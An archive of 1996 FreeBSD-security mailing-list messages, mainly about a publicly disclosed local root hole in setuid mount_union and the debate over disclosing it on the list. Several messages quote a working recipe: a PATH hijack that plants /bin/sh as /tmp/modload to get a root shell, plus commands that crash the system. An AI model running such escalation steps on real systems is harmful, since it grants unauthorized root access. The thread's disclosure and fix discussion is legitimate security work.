From owner-freebsd-security Mon May 13 03:25:55 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id DAA09945 for security-outgoing; Mon, 13 May 1996 03:25:55 -0700 (PDT) Received: from falcon.tioga.com (root@falcon.tioga.com [205.146.65.5]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id DAA09939 for ; Mon, 13 May 1996 03:25:52 -0700 (PDT) Received: (from tbalfe@localhost) by falcon.tioga.com (8.7.5/8.6.12) id GAA02731; Mon, 13 May 1996 06:26:30 GMT Date: Mon, 13 May 1996 06:26:30 +0000 () From: Thomas J Balfe To: freebsd-security@freebsd.org Subject: anyone ever get this message? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk May 13 06:22:39 falcon in.identd[2686]: warning: can't get client address: Socket is not connected May 13 06:22:39 falcon in.identd[2686]: connect from unknown ======================================================================== Thomas J Balfe tbalfe@tioga.com President http://www.tioga.com/ Tioga Communications, Inc 814-867-4770 ======================================================================== From owner-freebsd-security Mon May 13 07:42:51 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id HAA24991 for security-outgoing; Mon, 13 May 1996 07:42:51 -0700 (PDT) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id HAA24954 for ; Mon, 13 May 1996 07:42:43 -0700 (PDT) Message-Id: <199605131442.HAA24954@freefall.freebsd.org> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA037908521; Tue, 14 May 1996 00:42:01 +1000 From: Darren Reed Subject: Re: anyone ever get this message? To: tbalfe@tioga.com (Thomas J Balfe) Date: Tue, 14 May 1996 00:42:01 +1000 (EST) Cc: freebsd-security@FreeBSD.ORG In-Reply-To: from "Thomas J Balfe" at May 13, 96 06:26:30 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk In some mail from Thomas J Balfe, sie said: > > May 13 06:22:39 falcon in.identd[2686]: warning: can't get client > address: Socket is not connected > May 13 06:22:39 falcon in.identd[2686]: connect from unknown Looks like a half-open port scan. Linux does similar and on BSD tcp wrappers, for the most part, don't pick them up. Unless you have something recording packets, you'll never see the source address (connection is closed before accept can work). darren From owner-freebsd-security Mon May 13 10:56:00 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id KAA08579 for security-outgoing; Mon, 13 May 1996 10:56:00 -0700 (PDT) Received: from orion.webspan.net (orion.webspan.net [206.154.70.41]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id KAA08573 for ; Mon, 13 May 1996 10:55:58 -0700 (PDT) Received: (from scanner@localhost) by orion.webspan.net (8.7.5/8.6.12) id NAA06845; Mon, 13 May 1996 13:55:00 -0400 (EDT) Date: Mon, 13 May 1996 13:55:00 -0400 (EDT) From: Scanner SOD To: Thomas J Balfe cc: freebsd-security@freebsd.org Subject: Re: anyone ever get this message? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Mon, 13 May 1996, Thomas J Balfe wrote: > May 13 06:22:39 falcon in.identd[2686]: warning: can't get client > address: Socket is not connected > May 13 06:22:39 falcon in.identd[2686]: connect from unknown Ive had that before on a stock system. But after throwing tcpwrappers on and a new pidentd it stopped. I dont know why but it did. -- ===================================| Webspan Inc., ISP Division. FreeBSD 2.1.0 is available now! | Phone: 908-367-8030 ext. 126 -----------------------------------| 500 West Kennedy Blvd., Lakewood, NJ-08701 Turning PCs into Workstations | E-Mail: scanner@webspan.net ===================================| SysAdmin / Network Engineer / Consultant From owner-freebsd-security Wed May 15 16:17:07 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id QAA01871 for security-outgoing; Wed, 15 May 1996 16:17:07 -0700 (PDT) Received: from haven.uniserve.com (haven.uniserve.com [198.53.215.121]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id QAA01866 for ; Wed, 15 May 1996 16:17:04 -0700 (PDT) Received: by haven.uniserve.com id <30761-153>; Wed, 15 May 1996 16:20:29 -0800 Date: Wed, 15 May 1996 16:20:18 -0700 (PDT) From: Tom Samplonius To: Darren Reed cc: Thomas J Balfe , freebsd-security@freebsd.org Subject: Re: anyone ever get this message? In-Reply-To: <199605131442.HAA24954@freefall.freebsd.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Tue, 14 May 1996, Darren Reed wrote: > In some mail from Thomas J Balfe, sie said: > > > > May 13 06:22:39 falcon in.identd[2686]: warning: can't get client > > address: Socket is not connected > > May 13 06:22:39 falcon in.identd[2686]: connect from unknown > > Looks like a half-open port scan. No, inetd wouldn't spawn idnetd unless the socket was open. > Linux does similar and on BSD tcp wrappers, for the most part, don't pick > them up. > > Unless you have something recording packets, you'll never see the source > address (connection is closed before accept can work). Here's problably what happens: - you iniatate connect to some server - server sends ident query - you close you connect to server - ident query arrives but socket doesn't exist Tom From owner-freebsd-security Wed May 15 16:34:38 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id QAA03168 for security-outgoing; Wed, 15 May 1996 16:34:38 -0700 (PDT) Received: from kes.tioga.com (root@kes.tioga.com [205.146.65.40]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id QAA03155 for ; Wed, 15 May 1996 16:34:29 -0700 (PDT) Received: (from tbalfe@localhost) by kes.tioga.com (8.7.5/8.6.12) id TAA01750; Wed, 15 May 1996 19:34:54 GMT Date: Wed, 15 May 1996 19:34:54 +0000 () From: Thomas J Balfe To: Tom Samplonius cc: Darren Reed , freebsd-security@freebsd.org Subject: Re: anyone ever get this message? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > Here's problably what happens: > > - you iniatate connect to some server > - server sends ident query > - you close you connect to server > - ident query arrives but socket doesn't exist This never used to happen with sendmail 8.6.12, but with 8.7.5 it seems to happen. I got sendmail from ftp.cert.org, although I don't want to go back to 8.6.12...hmmm ======================================================================== Thomas J Balfe tbalfe@tioga.com President http://www.tioga.com/ Tioga Communications, Inc 814-867-4770 ======================================================================== From owner-freebsd-security Wed May 15 16:39:18 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id QAA03599 for security-outgoing; Wed, 15 May 1996 16:39:18 -0700 (PDT) Received: from haven.uniserve.com (haven.uniserve.com [198.53.215.121]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id QAA03594 for ; Wed, 15 May 1996 16:39:16 -0700 (PDT) Received: by haven.uniserve.com id <30792-147>; Wed, 15 May 1996 16:42:39 -0800 Date: Wed, 15 May 1996 16:42:32 -0700 (PDT) From: Tom Samplonius To: Thomas J Balfe cc: Darren Reed , freebsd-security@freebsd.org Subject: Re: anyone ever get this message? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Wed, 15 May 1996, Thomas J Balfe wrote: > > Here's problably what happens: > > > > - you iniatate connect to some server > > - server sends ident query > > - you close your connect to server > > - ident query arrives but socket doesn't exist > > > This never used to happen with sendmail 8.6.12, but with 8.7.5 it seems > to happen. I got sendmail from ftp.cert.org, although I don't want to go > back to 8.6.12...hmmm It isn't serious. ident(d) shouldn't be trusted anyways. Tom From owner-freebsd-security Fri May 17 00:47:41 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id AAA24651 for security-outgoing; Fri, 17 May 1996 00:47:41 -0700 (PDT) Received: from nervosa.com (root@nervosa.com [192.187.228.86]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id AAA24645 for ; Fri, 17 May 1996 00:47:38 -0700 (PDT) Received: from onyx.nervosa.com (coredump@onyx.nervosa.com [10.0.0.1]) by nervosa.com (8.7.5/8.7.3) with SMTP id AAA21251 for ; Fri, 17 May 1996 00:47:35 -0700 (PDT) Date: Fri, 17 May 1996 00:47:31 -0700 (PDT) From: invalid opcode To: freebsd-security@freebsd.org Subject: BoS: SECURITY BUG in FreeBSD (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk hmmmmm == Chris Layne ======================================== Nervosa Computing == == coredump@nervosa.com ================ http://www.nervosa.com/~coredump == ---------- Forwarded message ---------- Date: Fri, 17 May 1996 09:12:13 METDST From: Krzysztof Labanowski To: best-of-security@suburbia.net Subject: BoS: SECURITY BUG in FreeBSD Hi! FreeBSD has a security hole... dangerous is mount_union if suid is set vulnerable systems are: FreeBSD 2.1 RELEASE/2.2 CURRENT probably FreeBSD 2.1 STABLE is not vulnerable to crash system (as a normal user) try this: mkdir a mkdir b mount_union ~/a ~/b mount_union -b ~/a ~/b to got euid try this: export PATH=/tmp:$PATH #if zsh, of course echo /bin/sh >/tmp/modload chmod +x /tmp/modload mount_union /dir1 /dir2 and You are root! Hole found by Adam Kubicki Best wishes Chris Labanowski KL From owner-freebsd-security Fri May 17 00:50:41 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id AAA24832 for security-outgoing; Fri, 17 May 1996 00:50:41 -0700 (PDT) Received: from nervosa.com (root@nervosa.com [192.187.228.86]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id AAA24826 for ; Fri, 17 May 1996 00:50:39 -0700 (PDT) Received: from onyx.nervosa.com (coredump@onyx.nervosa.com [10.0.0.1]) by nervosa.com (8.7.5/8.7.3) with SMTP id AAA21276; Fri, 17 May 1996 00:50:35 -0700 (PDT) Date: Fri, 17 May 1996 00:50:35 -0700 (PDT) From: invalid opcode To: freebsd-security@freebsd.org cc: jkh@time.cdrom.com Subject: very bad Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Uh oh This is valid [coredump@onyx] ~> sh $ export PATH=/tmp:$PATH $ echo /bin/sh >/tmp/modload $ chmod +x /tmp/modload $ mount_union /dir1 /dir2 # # w == Chris Layne ======================================== Nervosa Computing == == coredump@nervosa.com ================ http://www.nervosa.com/~coredump == From owner-freebsd-security Fri May 17 01:09:50 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id BAA25897 for security-outgoing; Fri, 17 May 1996 01:09:50 -0700 (PDT) Received: from time.cdrom.com (time.cdrom.com [204.216.27.226]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id BAA25891; Fri, 17 May 1996 01:09:46 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by time.cdrom.com (8.7.5/8.6.9) with SMTP id BAA13473; Fri, 17 May 1996 01:08:25 -0700 (PDT) To: invalid opcode cc: freebsd-security@freebsd.org, security-officer@freebsd.org Subject: Re: very bad In-reply-to: Your message of "Fri, 17 May 1996 00:50:35 PDT." Date: Fri, 17 May 1996 01:08:24 -0700 Message-ID: <13470.832320504@time.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > Uh oh > This is valid Ow! :-( Thanks for reporting this! You know though, for ones this bad I'd really rather you sent the message to security-officer@freebsd.org rather than freebsd-security in the future. There are easily over 1000 people on this list and you just announced a cookbook method for any shell account user to go root on a FreeBSD based ISP box; hardly the kind of information one would want to see widely circulated without a prepared fix, at the least. :-( Jordan From owner-freebsd-security Fri May 17 01:26:58 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id BAA26911 for security-outgoing; Fri, 17 May 1996 01:26:58 -0700 (PDT) Received: from nervosa.com (root@nervosa.com [192.187.228.86]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id BAA26900; Fri, 17 May 1996 01:26:53 -0700 (PDT) Received: from onyx.nervosa.com (coredump@onyx.nervosa.com [10.0.0.1]) by nervosa.com (8.7.5/8.7.3) with SMTP id BAA21562; Fri, 17 May 1996 01:26:44 -0700 (PDT) Date: Fri, 17 May 1996 01:26:43 -0700 (PDT) From: invalid opcode To: "Jordan K. Hubbard" cc: freebsd-security@freebsd.org, security-officer@freebsd.org Subject: Re: very bad In-Reply-To: <13470.832320504@time.cdrom.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Fri, 17 May 1996, Jordan K. Hubbard wrote: > Ow! :-( > > Thanks for reporting this! > > You know though, for ones this bad I'd really rather you sent the > message to security-officer@freebsd.org rather than freebsd-security > in the future. There are easily over 1000 people on this list and you > just announced a cookbook method for any shell account user to go root > on a FreeBSD based ISP box; hardly the kind of information one would > want to see widely circulated without a prepared fix, at the > least. :-( > Jordan Too bad it's already on BUGTRAQ and BoS which is way more than 1000 :-( And I would have sent it to security-officer@freebsd.org had I even known of such an address. The prepared fix is chmod u-s /sbin/mount_union. == Chris Layne ======================================== Nervosa Computing == == coredump@nervosa.com ================ http://www.nervosa.com/~coredump == From owner-freebsd-security Fri May 17 01:35:26 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id BAA27506 for security-outgoing; Fri, 17 May 1996 01:35:26 -0700 (PDT) Received: from time.cdrom.com (time.cdrom.com [204.216.27.226]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id BAA27499; Fri, 17 May 1996 01:35:20 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by time.cdrom.com (8.7.5/8.6.9) with SMTP id BAA13644; Fri, 17 May 1996 01:33:59 -0700 (PDT) To: invalid opcode cc: freebsd-security@freebsd.org, security-officer@freebsd.org Subject: Re: very bad In-reply-to: Your message of "Fri, 17 May 1996 01:26:43 PDT." Date: Fri, 17 May 1996 01:33:59 -0700 Message-ID: <13642.832322039@time.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > Too bad it's already on BUGTRAQ and BoS which is way more than 1000 :-( Ah well, what's done is done. > of such an address. The prepared fix is chmod u-s /sbin/mount_union. It should at least return EPERM! :-) Jordan From owner-freebsd-security Fri May 17 02:08:48 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id CAA00323 for security-outgoing; Fri, 17 May 1996 02:08:48 -0700 (PDT) Received: from nervosa.com (root@nervosa.com [192.187.228.86]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id CAA00318 for ; Fri, 17 May 1996 02:08:44 -0700 (PDT) Received: from onyx.nervosa.com (coredump@onyx.nervosa.com [10.0.0.1]) by nervosa.com (8.7.5/8.7.3) with SMTP id CAA22740; Fri, 17 May 1996 02:08:41 -0700 (PDT) Date: Fri, 17 May 1996 02:08:40 -0700 (PDT) From: invalid opcode To: freebsd-security@freebsd.org cc: jkh@time.cdrom.com Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk FWIW, I just forwarded the quick fix of chmod u-s /sbin/mount_union and a copy of the problem to root@everyone on www.freebsd.org 's gallery of freebsd'ers. Considering the bug details have already been posted to BUGTRAQ and BoS, there is really nothing you can do after that to stop the "bad guys" from hearing about it as they are most definetly on those lists. == Chris Layne ======================================== Nervosa Computing == == coredump@nervosa.com ================ http://www.nervosa.com/~coredump == From owner-freebsd-security Fri May 17 03:09:20 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id DAA04816 for security-outgoing; Fri, 17 May 1996 03:09:20 -0700 (PDT) Received: from terra.stack.urc.tue.nl (terra.stack.urc.tue.nl [131.155.140.128]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id DAA04808 for ; Fri, 17 May 1996 03:09:16 -0700 (PDT) Received: from xaa.stack.urc.tue.nl (uucp@localhost) by terra.stack.urc.tue.nl (8.7.5) with UUCP id MAA05982; Fri, 17 May 1996 12:09:04 +0200 (MET DST) Received: (from freebsd@localhost) by xaa.stack.urc.tue.nl (8.7.5/8.6.12) id MAA00566; Fri, 17 May 1996 12:06:00 +0200 (MET DST) From: FreeBSD matters of Mark Huizer (xaa) Message-Id: <199605171006.MAA00566@xaa.stack.urc.tue.nl> Subject: Re: very bad To: coredump@nervosa.com (invalid opcode) Date: Fri, 17 May 1996 12:05:59 +0200 (MET DST) Cc: freebsd-security@FreeBSD.org, jkh@time.cdrom.com In-Reply-To: from invalid opcode at "May 17, 96 00:50:35 am" Reply-To: xaa@stack.urc.tue.nl (Mark Huizer) X-Mailer: ELM [version 2.4ME+ PL17 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk > [coredump@onyx] ~> sh > $ export PATH=/tmp:$PATH > $ echo /bin/sh >/tmp/modload > $ chmod +x /tmp/modload > $ mount_union /dir1 /dir2 > # > # w > Well... if you want to allow for user-mounts, you shouldn't let it be an lkm is that so weird? Mark From owner-freebsd-security Fri May 17 03:10:22 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id DAA04919 for security-outgoing; Fri, 17 May 1996 03:10:22 -0700 (PDT) Received: from EUnet.yu ([194.247.192.33]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id DAA04852 for ; Fri, 17 May 1996 03:09:57 -0700 (PDT) Received: (from vjojic@localhost) by EUnet.yu (8.7.5/8.6.12) id MAA00475 for freebsd-security@freebsd.org; Fri, 17 May 1996 12:09:30 +0200 (MET DST) From: Vladimir Jojic Message-Id: <199605171009.MAA00475@EUnet.yu> Subject: Re: very bad To: freebsd-security@freebsd.org Date: Fri, 17 May 1996 12:09:30 +0200 (MET DST) In-Reply-To: from "invalid opcode" at May 17, 96 01:26:43 am X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Hi, What IS very bad about this whole thing, isn't existance of this bug, as much as how easliy information about it can be obtained. Even if you do send patch along with info, there is still danger that someone, gets up earlier than root, and then ... (sweat dreams, root!) I am not very familiar with mailing list programs, but there is posible improvment (if it isn't yet done): - add special class of mailing list, such as security list - when user wants to be added to this list, program checks if his root (of system from which mail came) is on the list: 1. yes, inform root (or address he left), about that user (even ask if he allows him to join this list, this is a bit fascist, but that's security) 2. not, inform root about existence of this list ask him if he wants to join (where to send him mail, how much to *delay* info on bugs to users on his system, or not even allow them to join (hey, maybe system is crackers nest)) if not, ask him should the user be allowed to join list I believe that it is obvious why *delay* is so important. This is just the sketch, of course. Maybe this message isn't for this list, but it certainly concerns, all of the readers. I admit that *delay* is a bit strong, but so are the closed list. There is still one problem, if we have a roOT od small system not connected to Internet, he can receive mail only on other system, that is connected. ROot of system connected to Internet, receives info before roOT of small system, and if has any malicious intention, he can surely, mess things up. But that comes to domain of human nature. I am not saying that this will solve all problems, but will *delay* some. Please, give your opinions on this, Vladimir Jojic (guru apprentice, still looking for teacher ... :) vjojic@EUnet.yu > > On Fri, 17 May 1996, Jordan K. Hubbard wrote: > > > Ow! :-( > > > > Thanks for reporting this! > > > > You know though, for ones this bad I'd really rather you sent the > > message to security-officer@freebsd.org rather than freebsd-security > > in the future. There are easily over 1000 people on this list and you > > just announced a cookbook method for any shell account user to go root > > on a FreeBSD based ISP box; hardly the kind of information one would > > want to see widely circulated without a prepared fix, at the > > least. :-( > > Jordan > > Too bad it's already on BUGTRAQ and BoS which is way more than 1000 :-( > And I would have sent it to security-officer@freebsd.org had I even known > of such an address. The prepared fix is chmod u-s /sbin/mount_union. > > == Chris Layne ======================================== Nervosa Computing == > == coredump@nervosa.com ================ http://www.nervosa.com/~coredump == > > From owner-freebsd-security Fri May 17 03:53:01 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id DAA06943 for security-outgoing; Fri, 17 May 1996 03:53:01 -0700 (PDT) Received: from sasami.jurai.net (root@sasami.jurai.net [206.151.208.162]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id DAA06938 for ; Fri, 17 May 1996 03:52:59 -0700 (PDT) Received: from localhost (winter@localhost) by sasami.jurai.net (8.7.4/8.7.3) with SMTP id FAA00410; Fri, 17 May 1996 05:52:50 -0500 (CDT) Date: Fri, 17 May 1996 05:52:49 -0500 (CDT) From: "Matthew N. Dodd" X-Sender: winter@sasami To: invalid opcode cc: freebsd-security@freebsd.org Subject: Re: very bad In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk I tried it and it crashed my box. Still, its not nice either way. I was online at the time chatting with the other admin and we blitzed all of our boxes. On Fri, 17 May 1996, invalid opcode wrote: > Uh oh > This is valid > > [coredump@onyx] ~> sh > $ export PATH=/tmp:$PATH > $ echo /bin/sh >/tmp/modload > $ chmod +x /tmp/modload > $ mount_union /dir1 /dir2 > # > # w | Matthew N. Dodd | winter@jurai.net | http://www.jurai.net/~winter | | Technical Manager | mdodd@intersurf.net | http://www.intersurf.net | | InterSurf Online | "Welcome to the net Sir, would you like a handbasket?"| From owner-freebsd-security Fri May 17 04:02:02 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id EAA07510 for security-outgoing; Fri, 17 May 1996 04:02:02 -0700 (PDT) Received: from ptavv.nsta.org (ptavv.gfoster.com [199.0.2.254]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id EAA07499 for ; Fri, 17 May 1996 04:01:58 -0700 (PDT) Received: (from gfoster@localhost) by ptavv.nsta.org (8.7.5/8.6.12) id HAA00301; Fri, 17 May 1996 07:00:35 -0400 (EDT) Date: Fri, 17 May 1996 07:00:35 -0400 (EDT) From: Glen Foster Message-Id: <199605171100.HAA00301@ptavv.nsta.org> To: jkh@time.cdrom.com CC: coredump@nervosa.com, freebsd-security@FreeBSD.ORG In-reply-to: <13642.832322039@time.cdrom.com> (jkh@time.cdrom.com) Subject: Re: very bad Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk I, for one, am very happy that he announced it to the group rather than attempting STO. I was able fix the systems for which I have responsibility immediately. Thanks to Chris for getting the word out! It will be interesting to see an announcement coming from CERT two or three months from now about a "new" security bug. Now the big question, except for the obvious, why was mount_union suid in the first place? --- Glen Foster > Date: Fri, 17 May 1996 01:33:59 -0700 > From: "Jordan K. Hubbard" > > > Too bad it's already on BUGTRAQ and BoS which is way more than 1000 :-( > > Ah well, what's done is done. > > > of such an address. The prepared fix is chmod u-s /sbin/mount_union. > > It should at least return EPERM! :-) > > Jordan > > > From owner-freebsd-security Fri May 17 05:18:05 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id FAA12529 for security-outgoing; Fri, 17 May 1996 05:18:05 -0700 (PDT) Received: from onyx.auscert.org.au (onyx0.auscert.org.au [203.5.112.10]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id FAA12524 for ; Fri, 17 May 1996 05:18:02 -0700 (PDT) Received: from amethyst.auscert.org.au (amethyst.auscert.org.au [203.5.112.218]) by onyx.auscert.org.au (8.7.5/8.7.1) with ESMTP id WAA05141; Fri, 17 May 1996 22:18:00 +1000 (EST) Received: from localhost (localhost [127.0.0.1]) by amethyst.auscert.org.au (8.7.5/8.7.2) with SMTP id WAA11280; Fri, 17 May 1996 22:17:58 +1000 (EST) Message-Id: <199605171217.WAA11280@amethyst.auscert.org.au> X-Authentication-Warning: amethyst.auscert.org.au: Host localhost [127.0.0.1] didn't use HELO protocol To: Vladimir Jojic cc: freebsd-security@freebsd.org Subject: Re: very bad In-reply-to: Your message of "Fri, 17 May 1996 12:09:30 +0200." <199605171009.MAA00475@EUnet.yu> Date: Fri, 17 May 1996 22:17:57 +1000 From: Danny Smith Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Vladimir Jojic writes: > What IS very bad about this whole thing, isn't existance of this bug, > as much as how easliy information about it can be obtained. Even if > you do send patch along with info, there is still danger that someone, > gets up earlier than root, and then ... (sweat dreams, root!) > > You know though, for ones this bad I'd really rather you sent the > > message to security-officer@freebsd.org rather than freebsd-security > > in the future. There are easily over 1000 people on this list and you > > just announced a cookbook method for any shell account user to go root > > on a FreeBSD based ISP box; hardly the kind of information one would > > want to see widely circulated without a prepared fix, at the > > least. :-( Another unfortunate part is that it is approaching midnight in Australia (and it is now past midnight in New Zealand) at the start of the weekend. Posting vulnerbility information like this has not helped any system administrators if they are all home for the weekend. All it has done is increase the exposure of their systems to attack by more poeple. I personally don't think that is helping anyone at all. Danny Smith. ========================================================================== Danny Smith | Fax: +61 7 3365 4477 AUSCERT | Phone: +61 7 3365 4417 c/- Prentice Centre | (answered during business hours) The University of Queensland | (on call after hours for emergencies) Qld. 4072. Australia | Internet: auscert@auscert.org.au Standard Disclaimer: My opinions do not neceseaarily reflect the policy of AUSCERT or The University of Queensland. From owner-freebsd-security Fri May 17 05:52:33 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id FAA13998 for security-outgoing; Fri, 17 May 1996 05:52:33 -0700 (PDT) Received: from sasami.jurai.net (root@sasami.jurai.net [206.151.208.162]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id FAA13993 for ; Fri, 17 May 1996 05:52:30 -0700 (PDT) Received: from localhost (winter@localhost) by sasami.jurai.net (8.7.4/8.7.3) with SMTP id HAA01641; Fri, 17 May 1996 07:52:22 -0500 (CDT) Date: Fri, 17 May 1996 07:52:21 -0500 (CDT) From: "Matthew N. Dodd" X-Sender: winter@sasami To: invalid opcode cc: freebsd-security@FreeBSD.org Subject: Re: your mail In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk On Fri, 17 May 1996, invalid opcode wrote: > FWIW, I just forwarded the quick fix of chmod u-s /sbin/mount_union and a > copy of the problem to root@everyone on www.freebsd.org 's gallery of > freebsd'ers. Considering the bug details have already been posted to > BUGTRAQ and BoS, there is really nothing you can do after that to stop > the "bad guys" from hearing about it as they are most definetly on those > lists. *evil cackle* My management luser forwarded me a copy of that with the frantic note "Do you know about this!!!?!" It was quite nice to be able to say "Yes, its been fixed for 3 hours, let me sleep damn it." *grin* Thanks for getting the info out Chris. | Matthew N. Dodd | winter@jurai.net | http://www.jurai.net/~winter | | Technical Manager | mdodd@intersurf.net | http://www.intersurf.net | | InterSurf Online | "Welcome to the net Sir, would you like a handbasket?"| From owner-freebsd-security Fri May 17 07:04:59 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id HAA18751 for security-outgoing; Fri, 17 May 1996 07:04:59 -0700 (PDT) Received: from fslg8.fsl.noaa.gov (fslg8.fsl.noaa.gov [137.75.131.171]) by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id HAA18746 for ; Fri, 17 May 1996 07:04:54 -0700 (PDT) Received: by fslg8.fsl.noaa.gov (5.57/Ultrix3.0-C) id AA04147; Fri, 17 May 96 14:04:36 GMT Message-Id: <9605171404.AA04147@fslg8.fsl.noaa.gov> Received: by emu.fsl.noaa.gov (1.40.112.3/16.2) id AA172301877; Fri, 17 May 1996 08:04:37 -0600 Date: Fri, 17 May 1996 08:04:37 -0600 From: Sean Kelly To: gfoster@gfoster.com Cc: jkh@time.cdrom.com, coredump@nervosa.com, freebsd-security@freebsd.org In-Reply-To: <199605171100.HAA00301@ptavv.nsta.org> (message from Glen Foster on Fri, 17 May 1996 07:00:35 -0400 (EDT)) Subject: Re: very bad Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk >>>>> "Glen" == Glen Foster writes: Glen> Now the big question, except for the obvious, why was Glen> mount_union suid in the first place? As well as mount_msdos ... it may have a similar vulnerability. -- Sean Kelly NOAA Forecast Systems Laboratory kelly@fsl.noaa.gov Boulder Colorado USA http://www-sdd.fsl.noaa.gov/~kelly/ From owner-freebsd-security Fri May 17 07:51:01 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id HAA21914 for security-outgoing; Fri, 17 May 1996 07:51:01 -0700 (PDT) Received: from halloran-eldar.lcs.mit.edu (halloran-eldar.lcs.mit.edu [18.26.0.159]) by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id HAA21907 for ; Fri, 17 May 1996 07:50:58 -0700 (PDT) Received: by halloran-eldar.lcs.mit.edu; (5.65/1.1.8.2/19Aug95-0530PM) id AA04803; Fri, 17 May 1996 10:50:50 -0400 Date: Fri, 17 May 1996 10:50:50 -0400 From: Garrett Wollman Message-Id: <9605171450.AA04803@halloran-eldar.lcs.mit.edu> To: "Jordan K. Hubbard" Cc: freebsd-security@freebsd.org Subject: Re: very bad 